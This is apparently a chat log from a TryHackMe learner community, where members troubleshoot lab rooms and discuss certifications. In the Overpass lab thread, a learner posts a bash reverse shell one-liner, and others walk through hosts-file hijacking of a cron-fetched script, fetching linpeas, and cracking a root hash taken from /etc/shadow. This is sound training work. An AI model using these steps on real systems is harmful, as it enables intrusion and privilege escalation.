just wanted to mention, that in the room 'cryptographyinfo' task 7, when you let the MS screen reader (using latest Edge) play on the tables, it creates an empy column when jumping between entries, making it a 3x3 table from the 3x2 original. Not yet a well established hacker, but I think you could exploit this, no?

anyone have trouble loading the vulnerability management exercise?

Eh, 83% through this path and trying to actually drive more information in(some of it's major review from classes and ISC2) and all I've won are the streaks and a title. Good luck to the rest and glad for those who worked hard and won their prizes as this finishes out tomorrow!

i have 2 tickets for lap top and 2 rooms left but no way i can finish by tommarow

i have just won title and 1 day streak

😦

i won a lot of knowledge, the rest was just a nice bonus where nothing but the free goodies came my way, but idc

the only thing grinding my gears about this is that the title locked my access to the advanced dc channels because it replaced my lvl group

i finish all the free rooms will anyone support me to premium voucher......... it would be nice i dedicate all my time on tryhackme but without premium its nothing

I feel like everyone would have that issue, but you can see why it would lock you out.

It's basically McDonald's Monopoly anyway, the two tickets doesn't mean anything.

Me 1 left

I contacted support and they said it was resolved, it’s not and I also don’t want to redo these again.

I finished the new Security Engineer path and downloaded my certificate. One day later the progress was partially back to zero (Secure Network Architecture, Traverse and the whole Managin Incidents section). This is fck annoying

How can I copy from Windows RDP?

I am unable to copy my answer.

Please I need help.

Room OWASP API SECURITY

what tool are you using to connect to rdp???

Actually it was working in previous two questions

But it stopped ✋️

I restarted twice. Let me restart once again

Fortunately it works now

Congrats!!

My wife is out of town for the next couple of nights so I think I will finish up the path

What did you do to solve this? :-)

I’m having the same issue

Uh I think I had to copy/paste each part individually and put back together after changing the token

Once you complete the path, is there anything you receive as verification of completing the path?

You get a certificate of completion, I haven't gotten mine yet, but you will be able to download it on the right hand side of the learning path menu

ooo ty!

I wonder How r u guys getting engaged with tryHackMe ?

mine's 53

Hm

Hi guys, can someone give a hint on Task 5 of Active Dirctory hardening. I don't get any output after running the scripts. How can I find the flags?

You don't run the scripts, you open them in PowerShell editor as the question says and find the flag within the script itself

Thank you Hiro

How do you use dark mode in thm ?

Please I need help with Task 2 - Introduction to cryptography. I entered the following command to decrypt quote02:
Openssl aes-256-cbc -pbkdf2 -iter 10000 - d -in quote02 -out decryted_text.txt
But I receive a "bad decrypt" error after I enter the password a!kR3T55.
What can be the issue?

Its an extension

Which one ?

Darkreader.

Hello Everyone! I havent had much exp with api and tips for the Mother's Secret challenge?

any tips*

Take a look the concept of payload

You'll find the flag

Ok will do thank you

somebody having problems with the mothers secret challenge? site is not updating, followed different writeups now, but nothing is workinh

Mention your problem in detail

the mothers secret challenge (alien themed room) : "Exploit flaws found in Mother's code to reveal its secrets."
Trying to "Hitting the routes in the right order makes Mother confused, it might think you are a Science Officer!"
followed different writeups: using burpsuit or curl to POST. Apperently the website should change after this. there you schould get the second flag. well it is not. maybe i am doing something wrong. but atleast two others had the same problem.

Do you have a full time job or just a student?

same question

Please can someone help me with task 8 of the OWASP Top 10-2021? I'm stuck. I'm trying to ssh into the machine 10.10.116.248

You don't connect to SSH.

What should I do @fair orchid ?

Do what the task tells you to do.

Thank you. But looking at the source code, the folder is /assets, My question now is on which machine?

I left school when I was really young so no certification from there ...
I have a part time job for now to survive and paid for thm 😃
I find time I open thm 😃

Without a degree or any kind of certification I have to work my @$$ off to b on top 🎩 😎

That's impressive! I did a similar thing a couple of years ago when I changed careers to cybersecurity - Just blitz thm and I saved up for the security+ exam, I found a SOC analyst job in 9 months.

Best of luck to you!

U did security+ exam ?

Yeah. In terms of knowledge it's not particularly difficult, just a lot of memorising stuff. Having an industry recognised cert maybe shows you're taking it seriously? I don't know

Got it

Thanks though

It just acts like a +1 point when your resume is in front of the HR. Nothing else

Depending on your job hunt methods, if HR filtering is there, it can actually help a lot to get past HR to get your resume in the hands of a more technical person. It depends on the country you're in, and the companies you apply to. Not all request Security+ but it does pop up a lot as a requirement or a "nice to have".

I'm upto 83% with the expectation of finishing over the weekend and I'm loving this path..!

In this Path, for DATH section. It says we should use the Spider app but I'm not finding it on the vm

@sudden wagon In the AttackBox Open OWASP Zap: Applications > Web > OWASP Zap

/root/Desktop/Tools/Web/OWASP Zap

then under Tools > AJAX Spider

Learning Path Completed and it feel awesome..!

That's good

Can someone help me out with this question? What term refers to an address used to access websites?

Still need help?

No got through with the answer thank you....

Are you going through the process of getting SEC+? I am.

I'll be but I'm not ready yet I think after 3 months

I feel you! I'm not ready either. I'm thinking within the next 60 days; no rush.

Have u completed this path (security engineering)?

Not yet, been actively studying via other sources

But I have it bookmarked. I'm at a point in my life where I wish I had more hours in the day lol

Hello everyone..
Have anyone done the "overpass" room ?

Yes. Any questions?

Well I have done everything perfectly but I'm not getting response... after that I followed some write-ups but nothing...

So http.server isn't responding

In which specific step are you in?

Http is expected to give response here but I'm not getting

What do you mean? Are you serving any document via http.server?

Yeah

U have done overpass room right?

Yes, but I don't recall me needing to set up a http server other than to copy lse or linpeas into the target. Do you already have initial access to the box via || ssh key ||?

Ok here is details
I have done the first task getting flag in user.txt
Now comes second
I started a python server as u can see in the picture
And created a directory /downloads/src/buildscript.sh
There is a reverse shell in that file
And also started a netcat listener
Also replaced ip of the /etc/hosts of overpass.thm to my own machine

What's wrong with this approach

?

What modification did you do to the /etc/hosts file specifically?

Just replaced the ip of overpass.thm

Got it.

Aahh. I remember now.

Did you try to acces the file you have served via your browser to confirm that it is accessible?

How would I access that

http://your ip/

Ok I downloaded that ... now what to do with that file

No need to download it, you only need to verify that it is accessible.

How would I do that

If I remember correctly, the cron job should run every minute?

From the victim machine, can you send a ping request to your kali VM?

Yes

If you can ping your attack machine from your VM, and you still do not receive the shell, can you check what is mentioned here?

https://www.youtube.com/watch?v=YHc0ux4jf54

I checked

😭 getting frustrated... I'm sitting here since the morning

Can you post here the resulting /etc/hosts file after the change you made?

You can delete it right after

my reverse shell: bash -i >& /dev/tcp/10.10.120.243/1234 0>&1

..

You can remove this now.

so what can i do to make it work ?

Just to confirm, 10.10.120.243 is your kali VM?

since the morning i have followed at least 5 write-ups and 2 videos ...... i dont know if im dumb or my computer

no

It should be your kali VM or Attackbox IP

thats the overpass room ip address

Since you are hosting the build.sh script and you want to execute it on the victim

it didnt worked so i tried vpn ip address that didnt work either ..... and nor di my kali machine ip

In the || /etc/hosts || file, you will put in your tun0 as it is the IP that is seen by the victim machine or VM and it is where you will host the || build.sh script || containing your reverse shell payload.

exactly this is what im doing

i have done a lot research then i came here to ask

You mentioned 10.10.120.243 is the Overpass VM IP?

but i just tried it once and o share here

Okay, from your victim machine (and setting up your http.server), can you run || 'wget http://overpass.thm/downloads/src/buildscript.sh' || ? What did you get?

its not really connecting

i dont think its possible to connect overpass.thm

wget http://10.10.120.243/downloads/src/buildscript.sh .....

i get buildscript like that

I thought you put your tun0 ip address (not Overpass VM IP) in the /etc/hosts file? And in your reverse shell payload, it should point to your tun0 ip address to connect back to your kali VM as well.

Hello
With wget I'm trying to get a file that's downloaded on my local machine on /tmp folder
And http server is connected
With ip
So when I try it shows 404 file not found

wget http://10.10.10.10:8000/myfile

What am doing wrong I also tried after ip /tmp/myfile but didn't work

Did you run the http server on the /tmp folder?

Oh .... I was running http on global.. I thought it doesn't matter

Yepp now it worked on /tmp

You can run the http server on parent folders, but still can access the contents of the child folders via wget, if that helps.

Help me

@strong spade

Yes? Seems to be sha512crypt.

You might want to add --format=sha512crypt in your command.

Well I tried but not working

Have you checked if there are extra trailing spaces in your hash?

No space

Can you try hashcat --identify <hash or hash file> or nth -t <hash>?

Just to check if there is something wrong with the hash.

You might have to install name-that-hash though, but it is very useful.

$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infjI88U9yUXEVgL.

It's the hash if you get time please check it

Where did you get the hash? In case I worked on the box alreasy.

Ooh.. I remember this room.

From which step did you get the hash? Just to make sure it isn't a rabbit hole.

I got shell now I'm trying to get root access ...

Got it.

For that this hash is needed to be converted maybe

There's something wrong with your hash. Can you try copying it again from the source?

Did a one by one comparison of the hash you provided and the one that I have in my notes and a letter seemed to have been inadvertently deleted.

Send me the one you got in your notes

You got the hash from the shadow file, right? I'll have to type it manually as I don't have discord on my pc.

Can you paste it here?

..

$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infjI88U9yUXEVgL.

Hmm.. it is stil missing something

Can you paste here the screen capture of the shadow file?

Well I'm teaching in class right now... I can send later....

What it can b missing is after the last dot there were some numbers I thought they aren't required as hash they must b representing some kinda date or anything....

|| $6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL. ||

I added the character that was missing in this one.

It's D in last line
Thanks for the efforts
I'll send a screenshot when I'm on my laptop

Please remove or redact this picutre and add || before and after the f word above so as not to spoil it for other users. Thanks!

Gave +1 Rep to @reef crescent

Its part of the learning process. I'm also stuck in LFI for a couple of days now, not including the one I asked a hint for earlier (probably in 10 or more boxes.. 😅).

You are also learning... I thought you are here from THM to help us .... I was just thinking maybe you could b 😂

No, just helping other learners as we're all in the same boat.

Wow that's really nice

And what is robocop bot giving me ???

There's lots of folks here who are happy to help as well.

This one? Rep? Not sure what it is for though.

That password isn't working

What was the user in the line / record where you got the hash?

Root

The hash was from root

Is it have to be from John ?

You should || su root || then.

Oh

Stupid me 🤷🤣

useless internet points

@strong spade
I have a problem in overpass room

On Target machine I'm trying to get a file with wget
And http server running on the directory where the file is

It just show connecting but after few minutes it says reconnecting

Machine ip is working I can access from the browser with http server on but not on Target machine

What does the error say?

As I said
It says connecting but after few moments it says retrying
I don't see any obvious error

Can you show a screenshot?

Aside from sharing a screenshot, have you looked at other means of transferring the file such as netcat?

i can access it with browser

here goes the target machine

i tried nc too

sir ! take a look at screenshots

How about curl?

Well how do I do that

?

On Target machine?

Yes. You need to check if there is curl on the machine

which curl

/usr/bin/curl

Can you try curl -o linpeas.sh http://10.17.69.35:8000/linpeas.sh?

what does it suppose to do ?

It saves linpeas.sh to a file. If you don't add the -o option, it will output into the screen.

Is linpeas.sh now saved in your pwd?

nope

Can you cd to the /tmp folder?

And run the wget or curl commands there?

Though it seems the target machine is not reaching your kali VM

yepp same thing with /tmp

On your kali VM, can you run python3 -m http.server 8000 instead?

did and same

what possiblly could b wrong ?

something wrong with ip ... but its accesseble by the browser

Can you run sudo ufw status on your kali VM (to check if firewall is turned on)?

also i can access it with local like 127.0.0.1/linpeas.sh

What was the result of this command?

There you go

Change your port to 2222 or disable it altogether

on http server and target machine :8000 to :2222 ?

Yes or run 'sudo ufw disable'

hell yeahh .... Thanks you made my day ... its morning i didnt wanted to be stuck in in the whole day ... Thanks ❤️

Glad I could help. I noticed that your wget and curl commands aren't reaching your http.server and you have permissions in the directory to write files. So the next candidate would be the firewall.

In secure network architecture
Could anyone explain the task 5
Why is it there? It's just confusing

Its a way to get familiarized with how firewall configs can help strength security of the network

Hi, I need help please.

I work on the Auditing and Monitoring room.

On TASK 6, we tell me "Using aureport, hom many failed logins have occured so far?".

I was run aureport --failed and I found Number of failed logins: 264but when I wrote 264 on input, it's not correct answer.

Can you help me and tell me where my mistake is please?

You're so close.

Did you get it?

Hi @fair orchid, I didn’t solved it.

Can you take a screenshot?

I'll send it to you when I get home 😉Around 9pm I think

You got a time zone there?

UTC+1 (France)

sorry for the delay, here is a screen of my order and the answer

what room is this please ?

That's wrong.

Ok, thanks, I’ll check it

Gave +1 Rep to @fair orchid (current: #2 - 1858)

hello- im on task 3 in intro to cryptography and i keep getting this error message when i try to decrypt the file

What exact command are you running (a screenshot would be helpful)?

i thought i attached it

duh...it would help if i hit send

nevermind i figured it out ...thank you though

hello- im stumped on the linux system hardening question. Heres some screenshots

thanks in advance

you need to ssh into the target machine... you just ran the command on the attackbox instead of the target machine

how do i find the target machine

ok i figured out the target machine is the active machine ip address but its asking for a password

i got it...lol

nice

same

got an issue with the room vulnersity task 4 , when i use burpsuite to launch a sniper attack to the webserver to know which extension allowed , burpsuite give me the same result for every extensions let me send it here

Have you tried looking at the response?

wym ?

they say the answer is .html

Look at the (server) response size instead of the request size.

i was looking at the wrong thing , thank you

i get the same issue

found a solution just decrypt without -pbkdf2 -iter 10000 in the command

Hello guys!! 👋

I have a question from the room “Breaching Active Directory”

Can anyone help with that please?

Just drop your question here and someone will get back to you when they know the answer. You can also post your question in #breaching-ad

Oh right yeah didn’t know there was a dedicated room for breachingad

Thanks

Hello, I am in the virtualization and containers room in the security engineer path and I am have errors when I try to start mini kube in the Kubernetes section.
the instructions says to run minikube start but I get errors after running the command. Can anyone try and let know if they see the same issue?

If you need help with errors it helps to share those errors, either as screenshot or copy&paste. Maybe someone who is not willing to invest the time to replicate your scenario would be able to immediately point out the problem looking at the error messages.

I have the same error. Its due to the TLS cert being out of date as of May 24th 2024. I've asked in #room-help , not sure if i'll get a reply

This has been known to THM for at least 3 weeks. There's nothing you can do but wait.

ok, thanks